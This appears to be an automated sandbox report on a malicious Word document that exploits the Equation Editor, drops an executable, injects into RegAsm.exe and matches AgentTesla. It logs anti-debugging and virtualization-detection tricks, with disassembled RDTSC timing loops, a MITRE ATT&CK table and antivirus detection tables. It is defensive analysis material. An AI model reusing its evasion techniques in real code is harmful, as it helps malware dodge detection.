Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\69577.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D3918 second address: 00000000005D3918 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F957CAC2328h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F957CAC2332h 0x0000001f cmp bx, bx 0x00000022 cmp bx, dx 0x00000025 pop ecx 0x00000026 add edi, edx 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007F957CAC22F7h 0x0000002e cmp ah, bh 0x00000030 test cl, dl 0x00000032 push ecx 0x00000033 call 00007F957CAC23A9h 0x00000038 call 00007F957CAC2338h 0x0000003d lfence 0x00000040 mov edx, dword ptr [7FFE0014h] 0x00000046 lfence 0x00000049 ret 0x0000004a mov esi, edx 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D38DF second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F957C3859D2h 0x0000000c pushad 0x0000000d mov bx, 2AB1h 0x00000011 cmp bx, 2AB1h 0x00000016 jne 00007F957C382536h 0x0000001c popad 0x0000001d ret 0x0000001e jmp 00007F957C3859D2h 0x00000020 test dx, ax 0x00000023 jmp 00007F957C3859D2h 0x00000025 cmp eax, edx 0x00000027 jmp 00007F957C3859D2h 0x00000029 test bl, bl 0x0000002b jmp 00007F957C3859D2h 0x0000002d test dh, dh 0x0000002f mov dword ptr [ebp+0000009Ch], 00000000h 0x00000039 jmp 00007F957C3859D2h 0x0000003b test bx, ax 0x0000003e xor edi, edi 0x00000040 jmp 00007F957C3859D2h 0x00000042 test bl, 00000069h 0x00000045 mov ecx, 000186A0h 0x0000004a jmp 00007F957C3859D2h 0x0000004c test dx, ax 0x0000004f jmp 00007F957C3859D2h 0x00000051 cmp eax, edx 0x00000053 test dx, cx 0x00000056 cmp bx, dx 0x00000059 push ecx 0x0000005a call 00007F957C385A62h 0x0000005f call 00007F957C385A22h 0x00000064 lfence 0x00000067 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D3A7D second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test cl, 00000016h 0x0000000d add dword ptr [ebp+0000009Ch], 01h 0x00000014 jmp 00007F957C3859D2h 0x00000016 test eax, ecx 0x00000018 add edi, edx 0x0000001a dec ecx 0x0000001b cmp ecx, 00000000h 0x0000001e jne 00007F957C385959h 0x00000020 cmp bx, dx 0x00000023 push ecx 0x00000024 call 00007F957C385A62h 0x00000029 call 00007F957C385A22h 0x0000002e lfence 0x00000031 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D3473 second address: 00000000005D5189 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F957C3859D2h 0x0000000c test ch, ah 0x0000000e jmp 00007F957C387110h 0x00000013 call 00007F957C384277h 0x00000018 pop eax 0x00000019 cmp ax, dx 0x0000001c push edi 0x0000001d push eax 0x0000001e call 00007F957C387693h 0x00000023 jmp 00007F957C3859D2h 0x00000025 pushad 0x00000026 mov ebx, 000000ACh 0x0000002b rdtsc

Tries to detect Any.run

Show sources

Source: C:\Users\Public\69577.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: RegAsm.exe

Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D3918 second address: 00000000005D3918 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F957CAC2328h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d jmp 00007F957CAC2332h 0x0000001f cmp bx, bx 0x00000022 cmp bx, dx 0x00000025 pop ecx 0x00000026 add edi, edx 0x00000028 dec ecx 0x00000029 cmp ecx, 00000000h 0x0000002c jne 00007F957CAC22F7h 0x0000002e cmp ah, bh 0x00000030 test cl, dl 0x00000032 push ecx 0x00000033 call 00007F957CAC23A9h 0x00000038 call 00007F957CAC2338h 0x0000003d lfence 0x00000040 mov edx, dword ptr [7FFE0014h] 0x00000046 lfence 0x00000049 ret 0x0000004a mov esi, edx 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D38DF second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F957C3859D2h 0x0000000c pushad 0x0000000d mov bx, 2AB1h 0x00000011 cmp bx, 2AB1h 0x00000016 jne 00007F957C382536h 0x0000001c popad 0x0000001d ret 0x0000001e jmp 00007F957C3859D2h 0x00000020 test dx, ax 0x00000023 jmp 00007F957C3859D2h 0x00000025 cmp eax, edx 0x00000027 jmp 00007F957C3859D2h 0x00000029 test bl, bl 0x0000002b jmp 00007F957C3859D2h 0x0000002d test dh, dh 0x0000002f mov dword ptr [ebp+0000009Ch], 00000000h 0x00000039 jmp 00007F957C3859D2h 0x0000003b test bx, ax 0x0000003e xor edi, edi 0x00000040 jmp 00007F957C3859D2h 0x00000042 test bl, 00000069h 0x00000045 mov ecx, 000186A0h 0x0000004a jmp 00007F957C3859D2h 0x0000004c test dx, ax 0x0000004f jmp 00007F957C3859D2h 0x00000051 cmp eax, edx 0x00000053 test dx, cx 0x00000056 cmp bx, dx 0x00000059 push ecx 0x0000005a call 00007F957C385A62h 0x0000005f call 00007F957C385A22h 0x00000064 lfence 0x00000067 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D3B4F second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F957CAC4627h 0x0000001d popad 0x0000001e call 00007F957CAC236Ah 0x00000023 lfence 0x00000026 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D3A7D second address: 00000000005D3B4F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test cl, 00000016h 0x0000000d add dword ptr [ebp+0000009Ch], 01h 0x00000014 jmp 00007F957C3859D2h 0x00000016 test eax, ecx 0x00000018 add edi, edx 0x0000001a dec ecx 0x0000001b cmp ecx, 00000000h 0x0000001e jne 00007F957C385959h 0x00000020 cmp bx, dx 0x00000023 push ecx 0x00000024 call 00007F957C385A62h 0x00000029 call 00007F957C385A22h 0x0000002e lfence 0x00000031 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D534E second address: 00000000005D534E instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov dx, word ptr [esi+ecx] 0x0000000f jmp 00007F957CAC2332h 0x00000011 test dh, 00000068h 0x00000014 cmp bx, dx 0x00000017 jne 00007F957CAC2293h 0x0000001d push dword ptr [esp+04h] 0x00000021 jmp 00007F957CAC2332h 0x00000023 test bx, ax 0x00000026 call 00007F957CAC2555h 0x0000002b mov ebx, dword ptr [esp+04h] 0x0000002f xor ecx, ecx 0x00000031 add ecx, 02h 0x00000034 cmp word ptr [ebx+ecx], 0000h 0x00000039 jne 00007F957CAC2318h 0x0000003b add ecx, 02h 0x0000003e cmp word ptr [ebx+ecx], 0000h 0x00000043 jne 00007F957CAC2318h 0x00000045 add ecx, 02h 0x00000048 cmp word ptr [ebx+ecx], 0000h 0x0000004d jne 00007F957CAC2318h 0x0000004f add ecx, 02h 0x00000052 cmp word ptr [ebx+ecx], 0000h 0x00000057 jne 00007F957CAC2318h 0x00000059 add ecx, 02h 0x0000005c cmp word ptr [ebx+ecx], 0000h 0x00000061 jne 00007F957CAC2318h 0x00000063 add ecx, 02h 0x00000066 cmp word ptr [ebx+ecx], 0000h 0x0000006b jne 00007F957CAC2318h 0x0000006d add ecx, 02h 0x00000070 cmp word ptr [ebx+ecx], 0000h 0x00000075 jne 00007F957CAC2318h 0x00000077 retn 0004h 0x0000007a jmp 00007F957CAC2332h 0x0000007c cmp dh, dh 0x0000007e sub ecx, 02h 0x00000081 add eax, 02h 0x00000084 jmp 00007F957CAC2332h 0x00000086 cmp dl, cl 0x00000088 mov bx, word ptr [eax+ecx] 0x0000008c jmp 00007F957CAC2332h 0x0000008e pushad 0x0000008f lfence 0x00000092 rdtsc
Source: C:\Users\Public\69577.exe	RDTSC instruction interceptor: First address: 00000000005D3473 second address: 00000000005D5189 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a jmp 00007F957C3859D2h 0x0000000c test ch, ah 0x0000000e jmp 00007F957C387110h 0x00000013 call 00007F957C384277h 0x00000018 pop eax 0x00000019 cmp ax, dx 0x0000001c push edi 0x0000001d push eax 0x0000001e call 00007F957C387693h 0x00000023 jmp 00007F957C3859D2h 0x00000025 pushad 0x00000026 mov ebx, 000000ACh 0x0000002b rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	RDTSC instruction interceptor: First address: 0000000000093B4F second address: 0000000000093B4F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F957CAC4627h 0x0000001d popad 0x0000001e call 00007F957CAC236Ah 0x00000023 lfence 0x00000026 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_0009381F rdtsc

5_2_0009381F

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2412	Thread sleep time: -420000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 3008	Thread sleep time: -300000s >= -30000s			Jump to behavior

Source: RegAsm.exe

Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\Public\69577.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\Public\69577.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_0009381F rdtsc

5_2_0009381F

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_000959F0 mov eax, dword ptr fs:[00000030h]	5_2_000959F0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0009640D mov eax, dword ptr fs:[00000030h]	5_2_0009640D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_0009643D mov eax, dword ptr fs:[00000030h]	5_2_0009643D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096432 mov eax, dword ptr fs:[00000030h]	5_2_00096432
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096451 mov eax, dword ptr fs:[00000030h]	5_2_00096451
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096477 mov eax, dword ptr fs:[00000030h]	5_2_00096477
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_00096499 mov eax, dword ptr fs:[00000030h]	5_2_00096499
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_000955CD mov eax, dword ptr fs:[00000030h]	5_2_000955CD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Code function: 5_2_000936C3 mov eax, dword ptr fs:[00000030h]	5_2_000936C3

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\69577.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 90000

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Users\Public\69577.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1612	Jump to behavior

Source: RegAsm.exe, 00000005.00000002.2351782840.0000000001350000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegAsm.exe, 00000005.00000002.2351782840.0000000001350000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegAsm.exe, 00000005.00000002.2351782840.0000000001350000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Code function: 5_2_000938DD cpuid

5_2_000938DD

Source: C:\Users\Public\69577.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Jump to behavior

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match

File source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, type: MEMORY

Source: Yara match	File source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2464, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match

File source: 00000005.00000002.2355136875.000000001E5A1000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Spearphishing Link1	Exploitation for Client Execution13	Path Interception	Access Token Manipulation1	Masquerading121	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection112	Virtualization/Sandbox Evasion22	LSASS Memory	Security Software Discovery621	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools11	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery213	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
purchase order_2242021.doc	43%	Virustotal		Browse
purchase order_2242021.doc	28%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\PWua8[1].txt	12%	ReversingLabs	Win32.Trojan.Remcos
C:\Users\Public\69577.exe	12%	ReversingLabs	Win32.Trojan.Remcos

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
